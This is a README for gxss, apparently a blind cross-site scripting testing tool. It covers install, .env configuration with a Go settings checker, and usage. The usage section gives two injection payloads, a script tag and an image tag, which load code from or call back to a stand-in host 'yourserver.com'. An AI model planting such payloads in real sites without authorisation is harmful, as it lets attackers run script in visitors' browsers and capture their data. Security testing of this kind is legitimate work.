Blind XSS as a service

gxss is a simple tool that serves a JavaScript payload and lets you identify blind XSS vulnerabilities. It is similar to xsshunter, but a bit simpler to configure and run. Alerts can be sent via Slack or email. Emails also have a screenshot of the DOM attached (which is not possible over the Slack webhook API).


Note: The JavaScript payload was taken (and slightly modified) from xsshunter.

Installation

go get -u github.com/rverton/gxss

Configuration

Create a file called .env or set up your environment to export the following data:

PORT=8080
MAIL_SERVER=mail.example.com:25
MAIL_USER=user
MAIL_PASS=pass
MAIL_TO=hello@robinverton.de
MAIL_FROM=gxss@robinverton.de
SLACK_WEBHOOK=https://hooks.slack.com/XYZ
SERVE_URL=localhost:8080

SERVE_URL is the publicly accessible URL of your server.

You can leave the MAIL_* or the SLACK_WEBHOOK settings blank if you do not want to use them. Find out more about how to set up Slack webhooks here.
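
A pre-flight check for the settings above, added here as an example (it is not part of gxss): it parses .env-style text and reports a SERVE_URL that is empty or on loopback, a partly filled MAIL_* group, and the case where neither mail nor Slack is configured. The function names are hypothetical, and treating mail as usable only when all five MAIL_* values are set is an assumption.

```go
package main

import (
	"fmt"
	"strings"
)

// parseEnv reads KEY=VALUE lines; lines without "=" and # comments are skipped.
func parseEnv(text string) map[string]string {
	env := map[string]string{}
	for _, line := range strings.Split(text, "\n") {
		line = strings.TrimSpace(line)
		if k, v, ok := strings.Cut(line, "="); ok && !strings.HasPrefix(line, "#") {
			env[strings.TrimSpace(k)] = strings.TrimSpace(v)
		}
	}
	return env
}

// checkConfig flags settings that lose alerts (assumption: mail needs all five MAIL_* values).
func checkConfig(env map[string]string) []string {
	var problems []string
	u := env["SERVE_URL"]
	if u == "" || strings.HasPrefix(u, "localhost") || strings.HasPrefix(u, "127.") {
		problems = append(problems, "SERVE_URL is not a public address")
	}
	mailKeys := []string{"MAIL_SERVER", "MAIL_USER", "MAIL_PASS", "MAIL_TO", "MAIL_FROM"}
	set := 0
	for _, k := range mailKeys {
		if env[k] != "" {
			set++
		}
	}
	if set > 0 && set < len(mailKeys) {
		problems = append(problems, "MAIL_* is only partly set")
	}
	if set < len(mailKeys) && env["SLACK_WEBHOOK"] == "" {
		problems = append(problems, "no alert channel is fully configured")
	}
	return problems
}

func main() {
	// Constructed sample: mail half-filled, Slack blank, SERVE_URL still on loopback.
	sample := "PORT=8080\nMAIL_SERVER=mail.example.com:25\nSLACK_WEBHOOK=\nSERVE_URL=localhost:8080"
	fmt.Println(strings.Join(checkConfig(parseEnv(sample)), "\n"))
}
```

Since .env holds MAIL_PASS and the Slack webhook URL, keep the file readable only by the account that runs gxss.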

Usage

$ gxss

You can now use a payload like the following, which will load and execute the JavaScript payload:

<script src=//yourserver.com></script>

gxss can also be used as a request bin. Every request matching //yourserver.com/k{key} triggers an alert. Example:

<img src=//yourserver.com/kTARGET1>

Alternatives

  • xsshunter, python, most features, alerts require Mailgun account and wildcard certificate
  • xless, node.js, serverless on zeit.co, alerts over Slack
